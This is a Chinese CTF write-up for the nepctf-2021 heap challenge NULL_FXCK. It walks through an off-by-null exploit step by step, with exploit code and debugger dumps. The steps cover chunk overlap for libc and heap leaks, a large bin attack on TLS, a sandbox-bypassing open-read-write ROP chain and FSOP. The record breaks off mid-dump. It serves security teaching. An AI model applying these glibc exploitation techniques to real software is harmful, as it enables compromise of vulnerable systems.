2026-04-28

nepctf-2021 NULL_FXCK

程序分析

init

unsigned __int64 sub_14D0()
{
    setvbuf(stdin, 0, 2, 0);
    setvbuf(stdout, 0, 2, 0);
    setvbuf(stderr, 0, 2, 0);
    qword_4260 = (__int64)calloc(1u, 0x10u) - 656;
    return sub_13F0();
}

unsigned __int64 sub_13F0()
{
    __int64 v0; // rcx
    __int64 v1; // r8
    __int64 v2; // r9
    __int16 n8; // [rsp+0h] [rbp-68h] BYREF
    _QWORD *v5; // [rsp+8h] [rbp-60h]
    _QWORD v6[9]; // [rsp+10h] [rbp-58h] BYREF
    unsigned __int64 v7; // [rsp+58h] [rbp-10h]

    v7 = __readfsqword(0x28u);
    prctl(38, 1, 0, 0, 0);
    v6[0] = 0x400000020LL;
    v6[1] = 0xC000003E05000015LL;
    v6[3] = 0x4000000001000035LL;
    v6[4] = -4261412843LL;
    v6[5] = 0x3B00010015LL;
    v6[6] = 0x7FFF000000000006LL;
    n8 = 8;
    v5 = v6;
    v6[2] = 32;
    v6[7] = 6;
    prctl(22, 2, &n8, v0, v1, v2);
    return v7 - __readfsqword(0x28u);
}

两个 prctl 的调用表明这里大概率起了沙箱调用，禁止 execve 调用，也就限制了我们的 gadgets 获取 shell

check

unsigned __int64 check()
{
    void *(*volatile __malloc_hook)(size_t, const void *); // rt0
    void (*volatile __free_hook)(void *, const void *); // rt0
    __int64 v2; // rcx
    __int64 v3; // rdi
    unsigned __int64 v5; // [rsp+8h] [rbp-10h]

    v5 = __readfsqword(0x28u);
    __malloc_hook = _malloc_hook;
    if ( __malloc_hook || (__free_hook = _free_hook) != 0 || *(&calloc + 171091) != (void *(*)(size_t, size_t))&qword_80 )// "/lib64/ld-linux-x86-64.so.2"
        _exit(1);
    v2 = qword_4260;
    v3 = qword_4260 + 8;
    *(_QWORD *)qword_4260 = 0;
    *(_QWORD *)(v2 + 632) = 0;
    memset(
        (void *)(v3 & 0xFFFFFFFFFFFFFFF8LL),
        0,
        8 * ((unsigned __int64)((unsigned int)v2 - (v3 & 0xFFFFFFF8) + 640) >> 3));
    return v5 - __readfsqword(0x28u);
}

这里本质上还是初始化的过程，要求了以下几点：

要求 hook 为 NULL，即未被修改，这也就限制了我们篡改 hook 函数的想法
Canary 检查
对 tcache_perthread_struct 结构体进行清零

main

void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
  __int64 n3; // rbx
  char buf[10]; // [rsp+Eh] [rbp-2Ah] BYREF
  unsigned __int64 v5; // [rsp+18h] [rbp-20h]

  v5 = __readfsqword(0x28u);
  init_0();
  while ( 1 )
  {
    while ( 1 )
    {
      write(1, "1. Create\n2. Modify\n3. Delete\n4. Show\n", 0x26u);
      write(1, ">> ", 3u);
      read(0, buf, 0xAu);
      n3 = strtol(buf, 0, 10);
      check();
      if ( n3 != 3 )
        break;
      Delete();
    }
    if ( n3 > 3 )
    {
      if ( n3 == 4 )
        Show();
    }
    else if ( n3 == 1 )
    {
      Create();
    }
    else if ( n3 == 2 && n12245948 == 12245948 )
    {
      Modify();
    }
  }
}

Create

unsigned __int64 Create()
{
    __int64 v0; // rax
    __int64 v1; // rbp
    size_t size; // r12
    char *buf_2; // rax
    char *buf_1; // r13
    int v5; // eax
    char buf[10]; // [rsp+Eh] [rbp-3Ah] BYREF
    unsigned __int64 v8; // [rsp+18h] [rbp-30h]

    v8 = __readfsqword(0x28u);
    v0 = 0;
    while ( qword_4160[v0] )
    {
        if ( ++v0 == 32 )
            return v8 - __readfsqword(0x28u);         // 限制 v0 < 32
    }
    v1 = (int)v0;                                 // v0表示当前的chunk的index
    write(1, "(: Size: ", 9u);
    read(0, buf, 0xAu);                           // 读size
    size = strtol(buf, 0, 10);
    if ( size - 256 > 0x1F00 )
    {
        write(1, "Size Error ):\n", 0xEu);
        _exit(1);
    }
    buf_2 = (char *)malloc(size);                 // 地址buf_2
    buf_1 = buf_2;
    if ( !buf_2 )
    {
        write(1, "Malloc Error ):\n", 0x10u);
        _exit(1);
    }
    qword_4160[v1] = buf_2;                       // 存内容地址
    qword_4060[v1] = size;                        // 存大小
    write(1, "(: Content: ", 0xCu);
    v5 = read(0, buf_1, size);                    // 读取内容
    if ( v5 <= 0 )
        _exit(1);
    buf_1[v5 - 1] = 0;
    return v8 - __readfsqword(0x28u);
}

Modify

unsigned __int64 Modify()
{
    unsigned __int64 n; // rax
    unsigned __int64 m; // rbx
    _BYTE *buf_1; // rbp
    char buf[10]; // [rsp+Eh] [rbp-2Ah] BYREF
    unsigned __int64 v5; // [rsp+18h] [rbp-20h]

    v5 = __readfsqword(0x28u);
    n12245948 = 0;
    write(1, "Index: ", 7u);
    read(0, buf, 0xAu);
    n = strtol(buf, 0, 10);
    if ( !qword_4160[n] || (m = n, n > 0x1F) )
    {
        write(1, "Error Index ):\n", 0xFu);
        _exit(1);
    }
    write(1, "Content: ", 9u);
    buf_1 = (_BYTE *)qword_4160[m];
    buf_1[read(0, buf_1, qword_4060[m])] = 0;
    return v5 - __readfsqword(0x28u);
}

read 函数实际上返回的是读入的大小值，buf_1[read] 实际上也就是读取内容的最后一个数组，这里把读取内容的最后多加一个 0 的字符串，存在 off-by-null 漏洞。

unsigned __int64 sub_1870()
{
    unsigned __int64 n; // rax
    void *ptr; // rdi
    unsigned __int64 m; // rbx
    char buf[10]; // [rsp+Eh] [rbp-2Ah] BYREF
    unsigned __int64 v5; // [rsp+18h] [rbp-20h]

    v5 = __readfsqword(0x28u);
    write(1, "Index: ", 7u);
    read(0, buf, 0xAu);
    n = strtol(buf, 0, 10);
    ptr = (void *)qword_4160[n];
    if ( n > 0x1F || !ptr )
        sub_12C0(ptr);
    m = n;
    free(ptr);
    qword_4160[m] = 0;
    qword_4060[m] = 0;
    return v5 - __readfsqword(0x28u);
}

Delete

unsigned __int64 Delete()
{
    unsigned __int64 n; // rax
    void *ptr; // rdi
    unsigned __int64 m; // rbx
    char buf[10]; // [rsp+Eh] [rbp-2Ah] BYREF
    unsigned __int64 v5; // [rsp+18h] [rbp-20h]

    v5 = __readfsqword(0x28u);
    write(1, "Index: ", 7u);
    read(0, buf, 0xAu);
    n = strtol(buf, 0, 10);
    ptr = (void *)qword_4160[n];
    if ( n > 0x1F || !ptr )
        sub_12C0(ptr);
    m = n;
    free(ptr);
    qword_4160[m] = 0;
    qword_4060[m] = 0;
    return v5 - __readfsqword(0x28u);
}

Show

ssize_t Show()
{
    unsigned __int64 m; // rax
    const void *buf_1; // rbp
    size_t n; // rdx
    char buf[10]; // [rsp+Eh] [rbp-1Ah] BYREF
    unsigned __int64 v5; // [rsp+18h] [rbp-10h]

    v5 = __readfsqword(0x28u);
    write(1, "Index: ", 7u);
    read(0, buf, 0xAu);
    m = strtol(buf, 0, 10);
    buf_1 = qword_4160[m];
    if ( m > 0x1F || !buf_1 )
        sub_12C0(buf);
    n = strlen(qword_4160[m]);
    return write(1, buf_1, n);
}

核心利用手法概述

信息泄露 (Leak)： 利用堆溢出/Off-by-Null 篡改 Chunk Size，制造堆块重叠 (Chunk Overlapping)，使得正在使用的堆块与 Unsorted Bin 中的堆块重叠，从而打印出 main_arena 的地址泄露 libc_base，以及堆指针泄露 heap_base。
布置 ORW 链： 在堆上的已知位置提前写入用于读取 Flag 的 ROP 链（Open -> Read -> Write）。
Large Bin Attack： 利用 Large Bin 插入机制的漏洞，向任意地址写入一个堆指针。这里的目标是写入 tls_struct。TLS 中保存着当前线程的 tcache_perthread_struct 指针。
伪造 Tcache & FSOP 劫持控制流： 通过上一步，让程序的 tcache 指向我们伪造在堆上的结构体。在这个结构体中，同时伪造了 _IO_FILE 结构。通过请求一个超大内存 add(0x1000)，触发 __malloc_assert 报错，报错机制会刷新 IO 流，触发伪造的 vtable，调用 setcontext，最终执行布置好的 ORW 链拿到 Flag。

EXP 思路：

构造堆风水造成信息泄露

add(0x418) #0 大小大于0x410，释放之后直接进UnSortedbin
add(0x1f8) #1
add(0x428) #2
add(0x438) #3
add(0x208) #4
add(0x428) #5
add(0x208) #6

free(0)   
free(3)
free(5)
free(2) # 释放后，chunk2 和 chunk3 会发生向后合并
gdb.attach()

pwndbg> heap
pwndbg will try to resolve the heap symbols via heuristic now since we cannot resolve the heap via the debug symbols.                                                                                                                                                                                                                                                                                      
This might not work in all cases. Use `help set resolve-heap-via-heuristic` for more details.                                                                                                                                     
                                                                                                                                                                                                                                  
Allocated chunk | PREV_INUSE
Addr: 0x5627ec806000
Size: 0x290 (with flag bits: 0x291)

Allocated chunk | PREV_INUSE
Addr: 0x5627ec806290
Size: 0x20 (with flag bits: 0x21)

Free chunk (unsortedbin) | PREV_INUSE     --> chunk 0 
Addr: 0x5627ec8062b0
Size: 0x420 (with flag bits: 0x421)
fd: 0x7f7561b6dc00
bk: 0x5627ec807350

Allocated chunk                           --> chunk 1
Addr: 0x5627ec8066d0
Size: 0x200 (with flag bits: 0x200)

Free chunk (unsortedbin) | PREV_INUSE     --> chunk 2 & 3 consolidate
Addr: 0x5627ec8068d0                          0x428 + 0x438 = 0x870
Size: 0x870 (with flag bits: 0x871)
fd: 0x5627ec807350
bk: 0x7f7561b6dc00

Allocated chunk                           --> chunk 4 
Addr: 0x5627ec807140
Size: 0x210 (with flag bits: 0x210)

Free chunk (unsortedbin) | PREV_INUSE     --> chunk 5
Addr: 0x5627ec807350
Size: 0x430 (with flag bits: 0x431)
fd: 0x5627ec8062b0
bk: 0x5627ec8068d0

Allocated chunk                           --> chunk 6
Addr: 0x5627ec807780
Size: 0x210 (with flag bits: 0x210)

Top chunk | PREV_INUSE
Addr: 0x5627ec807990
Size: 0x1f670 (with flag bits: 0x1f671)

pwndbg> bins
tcachebins
empty
fastbins
empty
unsortedbin
all: 0x5627ec8068d0(chunk2&3) —▸ 0x5627ec807350(chunk5) —▸ 0x5627ec8062b0(chunk0) —▸ 0x7f7561b6dc00 ◂— 0x5627ec8068d0(chunk2&3)
smallbins
empty
largebins
empty

到这里，堆上形成了一大片空闲区域。

1 2	payload = b'a'*0x428 + p64(0xc91) add(0x440, payload) # chunk 0 <- FIFO 分配 chunk0，并向下溢出，将下一个 chunk 的 size 改为 0xc91

此时 UnSortedbin : chunk2&3 -> chunk 0 -> main_arena + 96

pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x55f5ea696000
Size: 0x290 (with flag bits: 0x291)
---->  tcache_perthread_struct

Allocated chunk | PREV_INUSE
Addr: 0x55f5ea696290
Size: 0x20 (with flag bits: 0x21)

Free chunk (largebins) | PREV_INUSE
Addr: 0x55f5ea6962b0
Size: 0x420 (with flag bits: 0x421)
----> 原先 Chunk 0我们最早申请的 0x418


Allocated chunk
Addr: 0x55f5ea6966d0
Size: 0x200 (with flag bits: 0x200)
----> Chunk 1（大小 0x1f8 对齐到 0x200）。它一直在使用中，没有被释放。

Allocated chunk | PREV_INUSE
Addr: 0x55f5ea6968d0
Size: 0x450 (with flag bits: 0x451)
----> 新 Chunk 0 占据了原 Chunk 2 的位置

Free chunk (unsortedbin) | PREV_INUSE
Addr: 0x55f5ea696d20
Size: 0x420 (with flag bits: 0x421)
----> 被原先chunk2&3切剩下的碎片 主要占据了原 Chunk 3 的位置
 
Allocated chunk
Addr: 0x55f5ea697140
Size: 0x210 (with flag bits: 0x210)
----> Chunk 4

Free chunk (largebins) | PREV_INUSE
Addr: 0x55f5ea697350
Size: 0x430 (with flag bits: 0x431)
----> 原 Chunk 5
      在遍历 Unsorted Bin 时因为太小被放入了 Largebin。

Allocated chunk
Addr: 0x55f5ea697780
Size: 0x210 (with flag bits: 0x210)
----> Chunk 6

Top chunk | PREV_INUSE
Addr: 0x55f5ea697990
Size: 0x1f670 (with flag bits: 0x1f671)

制造了一个大小为 0xc91( 0x440 + 0x210 + 0x430 + 0x210 )的 Fake chunk，覆盖了后面的正在使用 chunk：

add(0x418) #2  恢复 0x55f5ea696d20 UnSortedbin
add(0x418) #3  恢复 0x55f5ea6962b0 Largebin
add(0x428) #5  恢复 0x55f5ea697350 Largebin
gdb.attach(io)
pause()

看一下当前堆情况：

pwndbg> heap                                                                                                                                                                                                                                                            
pwndbg will try to resolve the heap symbols via heuristic now since we cannot resolve the heap via the debug symbols.                                                                                                                                                   
This might not work in all cases. Use `help set resolve-heap-via-heuristic` for more details.                                                                                                                                                                           
                                                                                                                                                                                                                                                                        
Allocated chunk | PREV_INUSE                                                                                                                                                                                                                                            
Addr: 0x5625de302000                                                                                                                                                                                                                                                    
Size: 0x290 (with flag bits: 0x291)                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                        
Allocated chunk | PREV_INUSE                                                                                                                                                                                                                                            
Addr: 0x5625de302290                                                                                                                                                                                                                                                    
Size: 0x20 (with flag bits: 0x21)                                                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                        
Allocated chunk | PREV_INUSE                     chunk 3                                                                                                                                                                                                                          
Addr: 0x5625de3022b0                                                                                                                                                                                                                                                    
Size: 0x420 (with flag bits: 0x421)                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                        
Allocated chunk | PREV_INUSE                     chunk 1                                                                                                                                                                                                                     
Addr: 0x5625de3026d0                                                                                                                                                                                                                                                    
Size: 0x200 (with flag bits: 0x201)                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                        
Allocated chunk | PREV_INUSE                     chunk 0                                                                                                                                                                                                                        
Addr: 0x5625de3028d0                                                                                                                                                                                                                                                    
Size: 0x450 (with flag bits: 0x451)                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                        
Allocated chunk | PREV_INUSE                     chunk 2                                                                                                                                                                                                                       
Addr: 0x5625de302d20                                                                                                                                                                                                                                                    
Size: 0x420 (with flag bits: 0x421)                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                        
Allocated chunk | PREV_INUSE                     chunk 4                                                                                                                                                                                                                       
Addr: 0x5625de303140                                                                                                                                                                                                                                                    
Size: 0x210 (with flag bits: 0x211)                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                        
Allocated chunk | PREV_INUSE                     chunk 5                                                                                                                                                                                                                      
Addr: 0x5625de303350                                                                                                                                                                                                                                                    
Size: 0x430 (with flag bits: 0x431)                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                        
Allocated chunk | PREV_INUSE                     chunk 6                                                                                                                                                                                                                       
Addr: 0x5625de303780                                                                                                                                                                                                                                                    
Size: 0x210 (with flag bits: 0x211)

Top chunk | PREV_INUSE                           top chunk
Addr: 0x5625de303990
Size: 0x1f670 (with flag bits: 0x1f671)

1 2	free(3) free(2)

pwndbg> heap
pwndbg will try to resolve the heap symbols via heuristic now since we cannot resolve the heap via the debug symbols.                                                                                                                              
This might not work in all cases. Use `help set resolve-heap-via-heuristic` for more details.                                                                                                                                                      
                                                                                                                                                                                                                                                   
Allocated chunk | PREV_INUSE                                                                                                                                                                                                                       
Addr: 0x560eccb23000                                                                                                                                                                                                                               
Size: 0x290 (with flag bits: 0x291)                                                                                                                                                                                                                
                                                                                                                                                                                                                                                   
Allocated chunk | PREV_INUSE                                                                                                                                                                                                                       
Addr: 0x560eccb23290                                                                                                                                                                                                                               
Size: 0x20 (with flag bits: 0x21)                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                   
Free chunk (unsortedbin) | PREV_INUSE           chunk 3                                                                                                                                                                                                   
Addr: 0x560eccb232b0                                                                                                                                                                                                                               
Size: 0x420 (with flag bits: 0x421)                                                                                                                                                                                                                
fd: 0x7f07d2201c00                                                                                                                                                                                                                                 
bk: 0x560eccb23d20                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                   
Allocated chunk                                                                                                                                                                                                                                    
Addr: 0x560eccb236d0                                                                                                                                                                                                                               
Size: 0x200 (with flag bits: 0x200)                                                                                                                                                                                                                
                                                                                                                                                                                                                                                   
Allocated chunk | PREV_INUSE                                                                                                                                                                                                                       
Addr: 0x560eccb238d0                                                                                                                                                                                                                               
Size: 0x450 (with flag bits: 0x451)                                                                                                                                                                                                                
                                                                                                                                                                                                                                                   
Free chunk (unsortedbin) | PREV_INUSE           chunk 2                                                                                                                                                                                                   
Addr: 0x560eccb23d20                                                                                                                                                                                                                               
Size: 0x420 (with flag bits: 0x421)                                                                                                                                                                                                                
fd: 0x560eccb232b0                                                                                                                                                                                                                                 
bk: 0x7f07d2201c00                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                   
Allocated chunk                                                                                                                                                                                                                                    
Addr: 0x560eccb24140                                                                                                                                                                                                                               
Size: 0x210 (with flag bits: 0x210)                                                                                                                                                                                                                
                                                                                                                                                                                                                                                   
Allocated chunk | PREV_INUSE                    chunk 5                                                                                                                                                                                                 
Addr: 0x560eccb24350
Size: 0x430 (with flag bits: 0x431)

Allocated chunk | PREV_INUSE                    chunk 6
Addr: 0x560eccb24780
Size: 0x210 (with flag bits: 0x211)

Top chunk | PREV_INUSE
Addr: 0x560eccb24990
Size: 0x1f670 (with flag bits: 0x1f671)

# 利用重新分配,将 unsorted bin 的 fd/bk 指针落入我们可以 show 的堆块中
add(0x418, b'a'*9) #2
add(0x418) #3  重新添加chunk, 交换指针位置

# 此时chunk排列顺序为-> 2-1-0-3-4-5-6
free(3)
free(5)

add(0x9f8) # chunk3 清空 UnSortedbin 放入 Largebin
add(0x428, b'a') # chunk5 --> 申请回chunk5
gdb.attach(io)

# Off-by-Null 进一步伪造结构，放置 Top Chunk 保护
payload = b'a'*0x200 + p64(0xc90) + b'\x00'
edit(6, payload)
gdb.attach(io)

利用 off-by-null 修改 chunk3 的标志位为 0，为后面合并打铺垫

pwndbg> heap                                                                                                                                                                                                                      
pwndbg will try to resolve the heap symbols via heuristic now since we cannot resolve the heap via the debug symbols.                                                                                                             
This might not work in all cases. Use `help set resolve-heap-via-heuristic` for more details.                                                                                                                                     
                                                                                                                                                                                                                                  
Allocated chunk | PREV_INUSE                                                                                                                                                                                                      
Addr: 0x563c95392000                                                                                                                                                                                                              
Size: 0x290 (with flag bits: 0x291)                                                                                                                                                                                               
                                                                                                                                                                                                                                  
Allocated chunk | PREV_INUSE                                                                                                                                                                                                      
Addr: 0x563c95392290                                                                                                                                                                                                              
Size: 0x20 (with flag bits: 0x21)                                                                                                                                                                                                 
                                                                                                                                                                                                                                  
Allocated chunk | PREV_INUSE                         chunk 2                                                                                                                                                                       
Addr: 0x563c953922b0                                                                                                                                                                                                              
Size: 0x420 (with flag bits: 0x421)                                                                                                                                                                                               
                                                                                                                                                                                                                                  
Allocated chunk | PREV_INUSE                         chunk 1                                                                                                                                                                             
Addr: 0x563c953926d0                                                                                                                                                                                                              
Size: 0x200 (with flag bits: 0x201)                                                                                                                                                                                               
                                                                                                                                                                                                                                  
Allocated chunk | PREV_INUSE                         chunk 0                                                                                                                                                                             
Addr: 0x563c953928d0                                                                                                                                                                                                              
Size: 0x450 (with flag bits: 0x451)                                                                                                                                                                                               
                                                                                                                                                                                                                                  
Free chunk (largebins) | PREV_INUSE                                                                                                                                                                                               
Addr: 0x563c95392d20                                                                                                                                                                                                              
Size: 0x420 (with flag bits: 0x421)                                                                                                                                                                                               
fd: 0x7f882a876ff0                                                                                                                                                                                                                
bk: 0x7f882a876ff0                                                                                                                                                                                                                
fd_nextsize: 0x563c95392d20                                                                                                                                                                                                       
bk_nextsize: 0x563c95392d20                                                                                                                                                                                                       
                                                                                                                                                                                                                                  
Allocated chunk                                      chunk 4                                                                                                                                                                             
Addr: 0x563c95393140                                                                                                                                                                                                              
Size: 0x210 (with flag bits: 0x210)                                                                                                                                                                                               
                                                                                                                                                                                                                                  
Allocated chunk | PREV_INUSE                         chunk 5                                                                                                                                                                             
Addr: 0x563c95393350                                                                                                                                                                                                              
Size: 0x430 (with flag bits: 0x431)

Allocated chunk | PREV_INUSE                         chunk 6
Addr: 0x563c95393780
Size: 0x210 (with flag bits: 0x211)

Allocated chunk                                      chunk 3
Addr: 0x563c95393990
Size: 0xa00 (with flag bits: 0xa00)

Top chunk | PREV_INUSE
Addr: 0x563c95394390
Size: 0x1ec70 (with flag bits: 0x1ec71


0x563c95392d00: 0x6161616161616161      0x0000000000000c91
0x563c95392d10: 0x0000563c953922b0      0x0000563c95393350
0x563c95392d20: 0x0000000000000000      0x0000000000000421
0x563c95392d30: 0x00007f882a876ff0      0x00007f882a876ff0
0x563c95392d40: 0x0000563c95392d20      0x0000563c95392d20
0x563c95392d50: 0x0000000000000000      0x0000000000000000
0x563c95392d60: 0x0000000000000000      0x0000000000000000
...
0x563c95393780: 0x0000000000000430      0x0000000000000211
0x563c95393790: 0x6161616161616161      0x6161616161616161
...
0x563c95393980: 0x6161616161616161      0x6161616161616161
0x563c95393990: 0x0000000000000c90      0x0000000000000a00
0x563c953939a0: 0x0000000000000000      0x0000000000000000

add(0x418) # 隔离块1
add(0x208) # 隔离块2 防止top_chunk合并

free(3)

当 free3 时，glibc 检查他的标志位，发现他的标志位是 0，误认为前面的块是空闲的，之后 glibc 查 prev_size 位，发现前面一个块的大小为 0xc90，就会直接吞并前面 0xc90 个字节的空间，这就正好合并到我们之前伪造的 size -> 0xc91，欺骗 glibc 让其误认为这就是一个大小为 0xc90 的 chunk，全部合并到 UnSortedbin 当中。

0x563c95392d00: 0x6161616161616161      0x0000000000000c91
0x563c95392d10: 0x0000563c953922b0      0x0000563c95393350
0x563c95392d20: 0x0000000000000000      0x0000000000000421
0x563c95392d30: 0x00007f882a876ff0      0x00007f882a876ff0
0x563c95392d40: 0x0000563c95392d20      0x0000563c95392d20
0x563c95392d50: 0x0000000000000000      0x0000000000000000
0x563c95392d60: 0x0000000000000000      0x0000000000000000
...
0x563c95393780: 0x0000000000000430      0x0000000000000211
0x563c95393790: 0x6161616161616161      0x6161616161616161
...
0x563c95393980: 0x6161616161616161      0x6161616161616161
0x563c95393990: 0x0000000000000c90      0x0000000000000a00
0x563c953939a0: 0x0000000000000000      0x0000000000000000

看一下此时的堆块和 bins：

# 修复被破坏的内部 Chunk 头部
payload = p64(0) * 3 + p64(0x421)
add(0x430, payload)
gdb.attach(io)

我们从 heap 发现由于发生了一次非法的强行合并，被包裹在里面的 Chunk 4、Chunk 5 的头部实际上是混乱的

add(0x430, payload)：我们从那个超级大的空闲块中切下第一块，利用 payload 把内部残破的结构修复，防止接下来我们再去申请或者打印数据时导致 glibc 崩溃。

# add(0x1600) 之前

pwndbg will try to resolve the heap symbols via heuristic now since we cannot resolve the heap via the debug symbols.                                                                                                                                                   
This might not work in all cases. Use `help set resolve-heap-via-heuristic` for more details.                                                                                                                                                                           
                                                                                                                                                                                                                                                                        
Allocated chunk | PREV_INUSE                                                                                                                                                                                                                                            
Addr: 0x56230e394000                                                                                                                                                                                                                                                    
Size: 0x290 (with flag bits: 0x291)                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                        
Allocated chunk | PREV_INUSE                                                                                                                                                                                                                                            
Addr: 0x56230e394290                                                                                                                                                                                                                                                    
Size: 0x20 (with flag bits: 0x21)                                                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                        
Allocated chunk | PREV_INUSE                            chunk 2                                                                                                                                                                                                                
Addr: 0x56230e3942b0                                                                                                                                                                                                                                                    
Size: 0x420 (with flag bits: 0x421)                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                        
Allocated chunk | PREV_INUSE                            chunk 1                                                                                                                                                                                                                 
Addr: 0x56230e3946d0                                                                                                                                                                                                                                                    
Size: 0x200 (with flag bits: 0x201)                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                        
Allocated chunk | PREV_INUSE                            chunk 0                                                                                                                                                                                                               
Addr: 0x56230e3948d0                                                                                                                                                                                                                                                    
Size: 0x450 (with flag bits: 0x451)                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                        
Allocated chunk | PREV_INUSE                                                                                                                                                                                                                                            
Addr: 0x56230e394d20                                                                                                                                                                                                                                                    
Size: 0x420 (with flag bits: 0x421)                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                        
Free chunk (unsortedbin) | PREV_INUSE                   chunk 4 & 5 & 6 & 3                                                                                                                                                                                                                
Addr: 0x56230e395140                                                                                                                                                                                                                                                    
Size: 0x1250 (with flag bits: 0x1251)                                                                                                                                                                                                                                   
fd: 0x7fe4eac74c00                                                                                                                                                                                                                                                      
bk: 0x7fe4eac74c00                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                        
Allocated chunk                                                                                                                                                                                                                                                         
Addr: 0x56230e396390                                                                                                                                                                                                                                                    
Size: 0x210 (with flag bits: 0x210)                                                                                                                                                                                                                                     

Top chunk | PREV_INUSE
Addr: 0x56230e3965a0
Size: 0x1ea60 (with flag bits: 0x1ea61)

add(0x1600) # 将前面构造的巨大 chunk 推入 Unsorted Bin 或 Large Bin

# 泄露 Libc 基址
show(4)
libc_base = u64(io.recv(6).ljust(8, b'\x00')) - 0x6a0 - libc.sym["__malloc_hook"]
log.success(f"libc_base: {hex(libc_base)}")

# 泄露 Heap 基址：chunk 5 与带有 fd_nextsize 的 Large Bin 重叠，读取即可拿到堆地址
show(5)
heap_base = u64(io.recv(6).ljust(8, b'\x00')) - 0x2b0
log.success(f"heap_base: {hex(heap_base)}")

pwndbg> x/100gx 0x557b6b239140
0x557b6b239140: 0x0000000000000420      0x0000000000001251 chunk 4
0x557b6b239150: 0x00007f6f39ed4230      0x00007f6f39ed4230
0x557b6b239160: 0x0000557b6b239140      0x0000557b6b239140
0x557b6b239170: 0x0000000000000000      0x0000000000000000
0x557b6b239180: 0x0000000000000000      0x0000000000000000
...
0x557b6b239330: 0x0000000000000000      0x0000000000000000
0x557b6b239340: 0x0000000000000000      0x0000000000000000
0x557b6b239350: 0x0000000000000000      0x0000000000000431 chunk 5
0x557b6b239360: 0x0000557b6b2382b0      0x00007f6f39ed3ff0 
0x557b6b239370: 0x0000557b6b238d20      0x0000557b6b238d20
0x557b6b239380: 0x0000000000000000      0x0000000000000000
0x557b6b239390: 0x0000000000000000      0x0000000000000000
0x557b6b2393a0: 0x0000000000000000      0x0000000000000000

当前 largebin 的范围为 0x1200-0x13f0，也就是第 98 个桶， 98 * 2 * 8 + 0x80 = 0x6a0

__malloc_hook 和 main_arena 紧挨着，也就是 0x7f6f39ed3ba0 那个位置。

libc_base = u64(io.recv(6).ljust(8, b’\x00’)) - 0x6a0 - libc.sym[“__malloc_hook”] 成立

而当我们 show(5)的时候，先泄露的就是 0x0000557b6b2382b0 这个地址，减去 0x2b0 正好是 heap_base

布置 ORW ROP 链

# 计算 TLS 结构体地址 (Thread Local Storage)，它是 Large Bin Attack 的目标
tls_struct = libc_base + 0x1eb578 

# 获取各种 ROP gadget 和系统调用地址
sys_open = libc_base + libc.sym["open"]
sys_read = libc_base + libc.sym["read"]
sys_write = libc_base + libc.sym["write"]
sys_setcontext = libc_base + libc.sym["setcontext"] # glibc 2.29+ 用于栈迁移

# 用于后续 FSOP 伪造 vtable 的地址
IO_file_jumps = libc_base + 0x1e54c0
IO_helper_jumps = libc_base + 0x1e48c0

由于 TLS 中保存着指向tcache_perthread_struct 的指针。如果我们用 Large Bin Attack 把这个指针改写成我们的堆地址，那么我们就可以控制程序的 Tcachebin。
利用 SetContext 可以把栈的 RSP 指针拉到堆上

# 布置 ORW (Open-Read-Write) 链
free(0)
flag_addr = heap_base + 0x8e0 + 0x100 # 预估 "flag" 字符串在堆上的地址

# 1. open("flag", 0) -> fd=3
orw = p64(pop_rdi) + p64(flag_addr) + p64(pop_rsi) + p64(0) + p64(sys_open)
# 2. read(3, flag_addr + 0x100, 0x80)
orw += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(flag_addr + 0x100) + p64(pop_rdx_r12) + p64(0x40)*2 + p64(sys_read)
# 3. write(1, flag_addr + 0x100, 0x80)
orw += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(flag_addr + 0x100) + p64(pop_rdx_r12) + p64(0x40)*2 + p64(sys_write)
orw = orw.ljust(0x100, b'a')
orw += b'flag\x00\x00\x00\x00' # 写入目标文件名

add(0x440, orw) # 将 ORW 链写入堆中

pwndbg> heap                                                                                                                                                                                                                      
pwndbg will try to resolve the heap symbols via heuristic now since we cannot resolve the heap via the debug symbols.                                                                                                             
This might not work in all cases. Use `help set resolve-heap-via-heuristic` for more details.                                                                                                                                     
                                                                                                                                                                                                                                  
Allocated chunk | PREV_INUSE                                                                                                                                                                                                      
Addr: 0x5648fdbf7000                                                                                                                                                                                                              
Size: 0x290 (with flag bits: 0x291)                                                                                                                                                                                               
                                                                                                                                                                                                                                  
Allocated chunk | PREV_INUSE                                                                                                                                                                                                      
Addr: 0x5648fdbf7290                                                                                                                                                                                                              
Size: 0x20 (with flag bits: 0x21)                                                                                                                                                                                                 
                                                                                                                                                                                                                                  
Allocated chunk | PREV_INUSE                                                                                                                                                                                                      
Addr: 0x5648fdbf72b0                                                                                                                                                                                                              
Size: 0x420 (with flag bits: 0x421)                                                                                                                                                                                               
                                                                                                                                                                                                                                  
Allocated chunk | PREV_INUSE                                                                                                                                                                                                      
Addr: 0x5648fdbf76d0                                                                                                                                                                                                              
Size: 0x200 (with flag bits: 0x201)                                                                                                                                                                                               
                                                                                                                                                                                                                                  
Allocated chunk | PREV_INUSE                             chunk 0                                                                                                                                                                         
Addr: 0x5648fdbf78d0                                                                                                                                                                                                              
Size: 0x450 (with flag bits: 0x451)                                                                                                                                                                                               
                                                                                                                                                                                                                                  
Allocated chunk | PREV_INUSE                                                                                                                                                                                                      
Addr: 0x5648fdbf7d20                                                                                                                                                                                                              
Size: 0x420 (with flag bits: 0x421)                                                                                                                                                                                               
                                                                                                                                                                                                                                  
Free chunk (largebins) | PREV_INUSE                                                                                                                                                                                               
Addr: 0x5648fdbf8140                                                                                                                                                                                                              
